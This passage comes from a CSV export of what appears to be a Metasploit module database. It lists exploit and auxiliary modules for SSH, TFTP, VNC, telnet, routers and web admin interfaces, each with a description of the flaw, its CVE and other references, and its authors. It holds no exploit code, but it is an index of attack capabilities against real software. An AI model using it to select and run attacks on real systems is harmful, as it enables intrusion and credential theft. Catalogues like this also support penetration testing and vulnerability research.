is triggered through a validation error in SSH.c.","Metasploit Framework License (BSD)","f","2002-12-16 00:00:00",0,,"passive","t","BID-6407, CVE-2002-1359, OSVDB-8044, URL-http://www.rapid7.com/advisories/R7-0009.html","MC " 1090,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/securecrt_ssh1.rb","exploit","windows/ssh/securecrt_ssh1","exploit/windows/ssh/securecrt_ssh1","SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow",200,"This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. 
This module has only been tested on SecureCRT 3.4.4.","Metasploit Framework License (BSD)","f","2002-07-23 00:00:00",0,,"passive","t","BID-5287, CVE-2002-1059, OSVDB-4991","MC " 1091,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/sysax_ssh_username.rb","exploit","windows/ssh/sysax_ssh_username","exploit/windows/ssh/sysax_ssh_username","Sysax 5.53 SSH Username Buffer Overflow",300,"This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug.","Metasploit Framework License (BSD)","f","2012-02-27 00:00:00",0,,"aggressive","t","EDB-18535, OSVDB-79689, URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html","Craig Freyman, sinn3r " 1092,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssl/ms04_011_pct.rb","exploit","windows/ssl/ms04_011_pct","exploit/windows/ssl/ms04_011_pct","Microsoft Private Communications Transport Overflow",200,"This module exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack. This code is based on Johnny Cyberpunk's THC release and has been tested against Windows 2000 and Windows XP. To use this module, specify the remote port of any SSL service, or the port and protocol of an application that uses SSL. The only application protocol supported at this time is SMTP. You only have one chance to select the correct target, if you are attacking IIS, you may want to try one of the other exploits first (WebDAV). If WebDAV does not work, this more than likely means that this is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). 
Using the wrong target may not result in an immediate crash of the remote system.","Metasploit Framework License (BSD)","t","2004-04-13 00:00:00",0,,"aggressive","t","BID-10116, CVE-2003-0719, MSB-MS04-011, OSVDB-5250","hdm " 1093,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb","exploit","windows/telnet/gamsoft_telsrv_username","exploit/windows/telnet/gamsoft_telsrv_username","GAMSoft TelSrv 1.5 Username Buffer Overflow",200,"This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5. Other versions may also be affected. The service terminates after exploitation, so you only get one chance!","Metasploit Framework License (BSD)","f","2000-07-17 00:00:00",0,,"aggressive","t","BID-1478, CVE-2000-0665, OSVDB-373, URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip","patrick " 1094,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/telnet/goodtech_telnet.rb","exploit","windows/telnet/goodtech_telnet","exploit/windows/telnet/goodtech_telnet","GoodTech Telnet Server <= 5.0.6 Buffer Overflow",200,"This module exploits a stack buffer overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. 
By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2005-03-15 00:00:00",0,,"aggressive","t","BID-12815, CVE-2005-0768, OSVDB-14806","MC " 1095,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb","exploit","windows/tftp/attftp_long_filename","exploit/windows/tftp/attftp_long_filename","Allied Telesyn TFTP Server 1.9 Long Filename Overflow",200,"This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.","Metasploit Framework License (BSD)","f","2006-11-27 00:00:00",,,"aggressive","t","BID-21320, CVE-2006-6184, EDB-2887, OSVDB-11350, URL-ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip","patrick " 1096,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/distinct_tftp_traversal.rb","exploit","windows/tftp/distinct_tftp_traversal","exploit/windows/tftp/distinct_tftp_traversal","Distinct TFTP 3.10 Writable Directory Traversal Execution",600,"This module exploits a vulnerability found in Distinct TFTP server. The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context of 'SYSTEM'.","Metasploit Framework License (BSD)","f","2012-04-08 00:00:00",0,,"aggressive","t","EDB-18718, OSVDB-80984, URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf","modpr0be, sinn3r " 1097,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/dlink_long_filename.rb","exploit","windows/tftp/dlink_long_filename","exploit/windows/tftp/dlink_long_filename","D-Link TFTP 1.0 Long Filename Buffer Overflow",400,"This module exploits a stack buffer overflow in D-Link TFTP 1.0. 
By sending a request for an overly long file name, an attacker could overflow a buffer and execute arbitrary code. For best results, use bind payloads with nonx (No NX).","Metasploit Framework License (BSD)","f","2007-03-12 00:00:00",0,,"aggressive","t","BID-22923, CVE-2007-1435, OSVDB-33977","LSO , patrick " 1098,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/futuresoft_transfermode.rb","exploit","windows/tftp/futuresoft_transfermode","exploit/windows/tftp/futuresoft_transfermode","FutureSoft TFTP Server 2000 Transfer-Mode Overflow",200,"This module exploits a stack buffer overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all).","Metasploit Framework License (BSD)","t","2005-05-31 00:00:00",,,"aggressive","t","BID-13821, CVE-2005-1812, OSVDB-16954, URL-http://www.security.org.sg/vuln/tftp2000-1001.html","MC " 1099,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb","exploit","windows/tftp/netdecision_tftp_traversal","exploit/windows/tftp/netdecision_tftp_traversal","NetDecision 4.2 TFTP Writable Directory Traversal Execution",600,"This module exploits a vulnerability found in NetDecision 4.2 TFTP server. 
The software contains a directory traversal vulnerability that allows a remote attacker to write arbitrary file to the file system, which results in code execution under the context of user executing the TFTP Server.","Metasploit Framework License (BSD)","f","2009-05-16 00:00:00",0,,"aggressive","t","BID-35002, CVE-2009-1730, OSVDB-54607","Rob Kraus, juan vazquez " 1100,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/opentftp_error_code.rb","exploit","windows/tftp/opentftp_error_code","exploit/windows/tftp/opentftp_error_code","OpenTFTP SP 1.4 Error Packet Overflow",200,"This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable condition triggers when the TFTP opcode is configured as an error packet, the TFTP service will then format the message using a sprintf() function, which causes an overflow, therefore allowing remote code execution under the context of SYSTEM. The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone', or 'Service'). By default the target is set to 'Service' because that's the default configuration during OpenTFTP Server SP 1.4's installation.","Metasploit Framework License (BSD)","f","2008-07-05 00:00:00",0,,"aggressive","t","BID-29111, CVE-2008-2161, OSVDB-44904, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl","steponequit, tixxDZ" 1101,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb","exploit","windows/tftp/quick_tftp_pro_mode","exploit/windows/tftp/quick_tftp_pro_mode","Quick FTP Pro 2.1 Transfer-Mode Overflow",400,"This module exploits a stack buffer overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. 
This is a port of a sploit by Mati ""muts"" Aharoni.","Metasploit Framework License (BSD)","f","2008-03-27 00:00:00",1,,"aggressive","t","BID-28459, CVE-2008-1610, OSVDB-43784, URL-http://secunia.com/advisories/29494","Saint Patrick" 1102,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpd32_long_filename.rb","exploit","windows/tftp/tftpd32_long_filename","exploit/windows/tftp/tftpd32_long_filename","TFTPD32 <= 2.21 Long Filename Buffer Overflow",200,"This module exploits a stack buffer overflow in TFTPD32 version 2.21 and prior. By sending a request for an overly long file name to the tftpd32 server, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2002-11-19 00:00:00",,,"aggressive","t","BID-6199, CVE-2002-2226, OSVDB-45903","MC " 1103,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpdwin_long_filename.rb","exploit","windows/tftp/tftpdwin_long_filename","exploit/windows/tftp/tftpdwin_long_filename","TFTPDWIN v0.4.2 Long Filename Buffer Overflow",500,"This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.","Metasploit Framework License (BSD)","f","2006-09-21 00:00:00",0,,"aggressive","t","BID-20131, CVE-2006-4948, EDB-3132, OSVDB-29032","patrick " 1104,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb","exploit","windows/tftp/tftpserver_wrq_bof","exploit/windows/tftp/tftpserver_wrq_bof","TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",300,"This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw is due to the way TFTP handles the filename parameter extracted from a WRQ request. The server will append the user-supplied filename to TFTP server binary's path without any bounds checking, and then attempt to check this path with a fopen(). 
Since this isn't a valid file path, fopen() returns null, which allows the corrupted data to be used in a strcmp() function, causing an access violation. Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone' , and then manually select your target accordingly. A successful attempt will lead to remote code execution under the context of SYSTEM if run as a service, or the user if run as a standalone. A failed attempt will result a denial-of-service.","Metasploit Framework License (BSD)","f","2008-03-26 00:00:00",4,,"aggressive","t","BID-18345, CVE-2008-1611, EDB-5314, OSVDB-43785","Datacut, Mati Aharoni" 1105,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb","exploit","windows/tftp/threectftpsvc_long_mode","exploit/windows/tftp/threectftpsvc_long_mode","3CTftpSvc TFTP Long Mode Buffer Overflow",500,"This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2006-11-27 00:00:00",0,,"aggressive","t","BID-21301, CVE-2006-6183, OSVDB-30758, URL-http://secunia.com/advisories/23113/","MC " 1106,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/unicenter/cam_log_security.rb","exploit","windows/unicenter/cam_log_security","exploit/windows/unicenter/cam_log_security","CA CAM log_security() Stack Buffer Overflow (Win32)",500,"This module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. 
This module has been tested on Unicenter v3.1.","Metasploit Framework License (BSD)","t","2005-08-22 00:00:00",0,,"aggressive","t","BID-14622, CVE-2005-2668, OSVDB-18916","hdm " 1107,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/realvnc_client.rb","exploit","windows/vnc/realvnc_client","exploit/windows/vnc/realvnc_client","RealVNC 3.3.7 Client Buffer Overflow",300,"This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).","Metasploit Framework License (BSD)","f","2001-01-29 00:00:00",0,,"passive","t","BID-2305, CVE-2001-0167, OSVDB-6281","MC " 1108,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/ultravnc_client.rb","exploit","windows/vnc/ultravnc_client","exploit/windows/vnc/ultravnc_client","UltraVNC 1.0.1 Client Buffer Overflow",300,"This module exploits a buffer overflow in UltraVNC Win32 Viewer 1.0.1 Release.","Metasploit Framework License (BSD)","f","2006-04-04 00:00:00",0,,"passive","t","BID-17378, CVE-2006-1652, OSVDB-24456","MC " 1109,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb","exploit","windows/vnc/ultravnc_viewer_bof","exploit/windows/vnc/ultravnc_viewer_bof","UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",300,"This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. 
If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.","Metasploit Framework License (BSD)","f","2008-02-06 00:00:00",0,,"passive","t","BID-27561, CVE-2008-0610, OSVDB-42840","noperand" 1110,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vnc/winvnc_http_get.rb","exploit","windows/vnc/winvnc_http_get","exploit/windows/vnc/winvnc_http_get","WinVNC Web Server <= v3.3.3r7 GET Overflow",200,"This module exploits a buffer overflow in the AT&T WinVNC version <= v3.3.3r7 web server. When debugging mode with logging is enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads!","Metasploit Framework License (BSD)","t","2001-01-29 00:00:00",1,,"aggressive","t","BID-2306, CVE-2001-0168, OSVDB-6280","patrick " 1111,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/vpn/safenet_ike_11.rb","exploit","windows/vpn/safenet_ike_11","exploit/windows/vpn/safenet_ike_11","SafeNet SoftRemote IKE Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe service. When sending a specially crafted udp packet to port 62514 an attacker may be able to execute arbitrary code. 
This module has been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using windows/meterpreter/reverse_ord_tcp payloads.","Metasploit Framework License (BSD)","t","2009-06-01 00:00:00",0,,"aggressive","t","BID-35154, CVE-2009-1943, OSVDB-54831, URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1","MC " 1112,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/winrm/winrm_script_exec.rb","exploit","windows/winrm/winrm_script_exec","exploit/windows/winrm/winrm_script_exec","WinRM Script Exec Remote Code Execution",0,"This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. The module will check if Powershell 2.0 is available, and if so uses that method. Otherwise it falls back to the VBS Cmdstager which is less stealthy. IMPORTANT: If targeting an x64 system with the Powershell method you MUST select an x64 payload. An x86 payload will never return.","Metasploit Framework License (BSD)","t","2012-11-01 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx","thelightcosine" 1113,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/wins/ms04_045_wins.rb","exploit","windows/wins/ms04_045_wins","exploit/windows/wins/ms04_045_wins","Microsoft WINS Service Memory Overwrite",500,"This module exploits an arbitrary memory write flaw in the WINS service. 
This exploit has been tested against Windows 2000 only.","Metasploit Framework License (BSD)","t","2004-12-14 00:00:00",0,,"aggressive","t","BID-11763, CVE-2004-1080, MSB-MS04-045, OSVDB-12378","hdm " 1114,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/2wire/xslt_password_reset.rb","auxiliary","admin/2wire/xslt_password_reset","auxiliary/admin/2wire/xslt_password_reset","2Wire Cross-Site Request Forgery Password Reset Vulnerability",300,"This module will reset the admin password on a 2Wire wireless router. This is done by using the /xslt page where authentication is not required, thus allowing configuration changes (such as resetting the password) as administrators.","Metasploit Framework License (BSD)","f","2007-08-15 00:00:00",,,"aggressive","t","BID-36075, CVE-2007-4387, OSVDB-37667, URL-http://seclists.org/bugtraq/2007/Aug/225","Travis Phillips, hkm " 1115,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/backupexec/dump.rb","auxiliary","admin/backupexec/dump","auxiliary/admin/backupexec/dump","Veritas Backup Exec Windows Remote File Access",300,"This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. 
To transfer an entire directory, specify a path that includes a trailing backslash.","Metasploit Framework License (BSD)","f",,,"Download","aggressive","t","BID-14551, CVE-2005-2611, OSVDB-18695, URL-http://www.fpns.net/willy/msbksrc.lzh","Unknown, hdm " 1116,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/backupexec/registry.rb","auxiliary","admin/backupexec/registry","auxiliary/admin/backupexec/registry","Veritas Backup Exec Server Registry Access",300,"This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based on the NDR stub information information posted to openrce.org. Please see the action list for the different attack modes.","Metasploit Framework License (BSD)","f",,,"System Information","aggressive","t","CVE-2005-0771, OSVDB-17627, URL-http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities","hdm " 1117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb","auxiliary","admin/cisco/cisco_secure_acs_bypass","auxiliary/admin/cisco/cisco_secure_acs_bypass","Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change",300,"This module exploits an authentication bypass issue which allows arbitrary password change requests to be issued for any user in the local store. 
Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well as version 5.2 with either no patches or patches 1 and 2 are vulnerable.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47093, CVE-2011-0951, URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html","Jason Kratzer " 1118,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb","auxiliary","admin/cisco/vpn_3000_ftp_bypass","auxiliary/admin/cisco/vpn_3000_ftp_bypass","Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",300,"This module tests for a logic vulnerability in the Cisco VPN Concentrator 3000 series. It is possible to execute some FTP statements without authentication (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs when working with CWD commands. This module simply creates an arbitrary directory, verifies that the directory has been created, then deletes it and verifies deletion to confirm the bug.","Metasploit Framework License (BSD)","f","2006-08-23 00:00:00",,,"aggressive","t","BID-19680, CVE-2006-4313, OSVDB-28138, OSVDB-28139, URL-http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml","patrick " 1119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/db2/db2rcmd.rb","auxiliary","admin/db2/db2rcmd","auxiliary/admin/db2/db2rcmd","IBM DB2 db2rcmd.exe Command Execution Vulnerability",300,"This module exploits a vulnerability in the Remote Command Server component in IBM's DB2 Universal Database 8.1. 
An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe which could lead to administrator privileges.","Metasploit Framework License (BSD)","f","2004-03-04 00:00:00",,,"aggressive","t","BID-9821, CVE-2004-0795, OSVDB-4180","MC " 1120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb","auxiliary","admin/edirectory/edirectory_dhost_cookie","auxiliary/admin/edirectory/edirectory_dhost_cookie","Novell eDirectory DHOST Predictable Session Cookie",300,"This module is able to predict the next session cookie value issued by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run this module, wait until the real administrator logs in, then specify the predicted cookie value to hijack their session.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-60035","hdm " 1121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb","auxiliary","admin/edirectory/edirectory_edirutil","auxiliary/admin/edirectory/edirectory_edirutil","Novell eDirectory eMBox Unauthenticated File Access",300,"This module will access Novell eDirectory's eMBox service and can run the following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES, STOP_SERVICE, START_SERVICE, SET_LOGFILE.","Metasploit Framework License (BSD)","f",,,"LIST_SERVICES","aggressive","t","BID-28441, CVE-2008-0926, OSVDB-43690","MC , Nicob, sinn3r " 1122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb","auxiliary","admin/emc/alphastor_devicemanager_exec","auxiliary/admin/emc/alphastor_devicemanager_exec","EMC AlphaStor Device Manager Arbitrary Command Execution",300,"EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-05-27 00:00:00",,,"aggressive","t","BID-29398, CVE-2008-2157, OSVDB-45715, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703","MC " 1123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb","auxiliary","admin/emc/alphastor_librarymanager_exec","auxiliary/admin/emc/alphastor_librarymanager_exec","EMC AlphaStor Library Manager Arbitrary Command Execution",300,"EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-05-27 00:00:00",,,"aggressive","t","BID-29398, CVE-2008-2157, OSVDB-45715, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703","MC " 1124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb","auxiliary","admin/hp/hp_data_protector_cmd","auxiliary/admin/hp/hp_data_protector_cmd","HP Data Protector 6.1 EXEC_CMD Command Execution",300,"This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). Because of these behaviors, if you try to supply an argument, FindFirstFileW() will look at that as part of the filename, and then bail. 
Please note that when you specify the 'CMD' option, the base path begins under C:\.","Metasploit Framework License (BSD)","f","2011-02-07 00:00:00",,,"aggressive","t","CVE-2011-0923, OSVDB-72526, URL-http://c4an-dl.blogspot.com/hp-data-protector-vuln.html, URL-http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-055/","c4an, ch0ks, sinn3r , wireghoul" 1125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/axigen_file_access.rb","auxiliary","admin/http/axigen_file_access","auxiliary/admin/http/axigen_file_access","Axigen Arbitrary File Read and Delete",300,"This module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This module has been tested successfully on Axigen 8.10 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f","2012-10-31 00:00:00",,"Read","aggressive","t","CVE-2012-4940, OSVDB-86802, US-CERT-VU-586556","Zhao Liang, juan vazquez " 1126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb","auxiliary","admin/http/contentkeeper_fileaccess","auxiliary/admin/http/contentkeeper_fileaccess","ContentKeeper Web Appliance mimencode File Access",300,"This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary files outside of the webroot.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-54551, URL-http://www.aushack.com/200904-contentkeeper.txt","patrick " 1127,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb","auxiliary","admin/http/dlink_dir_300_600_exec_noauth","auxiliary/admin/http/dlink_dir_300_600_exec_noauth","D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution",300,"This module exploits an OS Command Injection vulnerability in some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in command.php, which is accessible without authentication. This module has been tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. In order to get a remote shell the telnetd could be started without any authentication.","Metasploit Framework License (BSD)","f","2013-02-04 00:00:00",,,"aggressive","t","EDB-24453, OSVDB-89861, URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router, URL-http://www.s3cur1ty.de/home-network-horror-days, URL-http://www.s3cur1ty.de/m1adv2013-003","Michael Messner " 1128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb","auxiliary","admin/http/dlink_dir_645_password_extractor","auxiliary/admin/http/dlink_dir_645_password_extractor","DLink DIR 645 Password Extractor",300,"This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. With this vulnerability you are able to extract the password for the remote management.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58231, OSVDB-90733, URL-http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt","Michael Messner , Roberto Paleari " 1129,"2013-05-13 05:04:44","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb","auxiliary","admin/http/dlink_dsl320b_password_extractor","auxiliary/admin/http/dlink_dsl320b_password_extractor","DLink DSL 320B Password Extractor",300,"This module exploits an authentication bypass vulnerability in DLink DSL 320B <=v1.23. 
This vulnerability allows to extract the credentials for the remote management interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-25252, OSVDB-93013, URL-http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem, URL-http://www.s3cur1ty.de/m1adv2013-018","Michael Messner " 1130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb","auxiliary","admin/http/hp_web_jetadmin_exec","auxiliary/admin/http/hp_web_jetadmin_exec","HP Web JetAdmin 6.5 Server Arbitrary Command Execution",300,"This module abuses a command execution vulnerability within the web based management console of the Hewlett-Packard Web JetAdmin network printer tool v6.2 - v6.5. It is possible to execute commands as SYSTEM without authentication. The vulnerability also affects POSIX systems, however at this stage the module only works against Windows. This module does not apply to HP printers.","Metasploit Framework License (BSD)","f","2004-04-27 00:00:00",,,"aggressive","t","BID-10224, EDB-294, OSVDB-5798","patrick " 1131,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/iis_auth_bypass.rb","auxiliary","admin/http/iis_auth_bypass","auxiliary/admin/http/iis_auth_bypass","MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",300,"This module bypasses basic authentication for Internet Information Services (IIS). 
By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.","Metasploit Framework License (BSD)","f","2010-07-02 00:00:00",,,"aggressive","t","CVE-2010-2731, MSB-MS10-065, OSVDB-66160, URL-http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/","Soroush Dalili, sinn3r " 1132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/intersil_pass_reset.rb","auxiliary","admin/http/intersil_pass_reset","auxiliary/admin/http/intersil_pass_reset","Intersil (Boa) HTTPd Basic Authentication Password Reset",300,"The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the password. In addition, the malicious attempt also may cause a denial-of-service condition. Please note that you must set the request URI to the directory that requires basic authentication in order to work properly.","Metasploit Framework License (BSD)","f","2007-09-10 00:00:00",,,"aggressive","t","BID-25676, URL-http://packetstormsecurity.org/files/59347/boa-bypass.txt.html","Claudio ""paper"" Merloni , Luca ""ikki"" Carettoni , Max Dietz " 1133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb","auxiliary","admin/http/iomega_storcenterpro_sessionid","auxiliary/admin/http/iomega_storcenterpro_sessionid","Iomega StorCenter Pro NAS Web Authentication Bypass",300,"The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs, allowing for simple brute force attacks to bypass authentication and gain administrative access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2009-2367, OSVDB-55586","patrick " 1134,"2013-05-07 
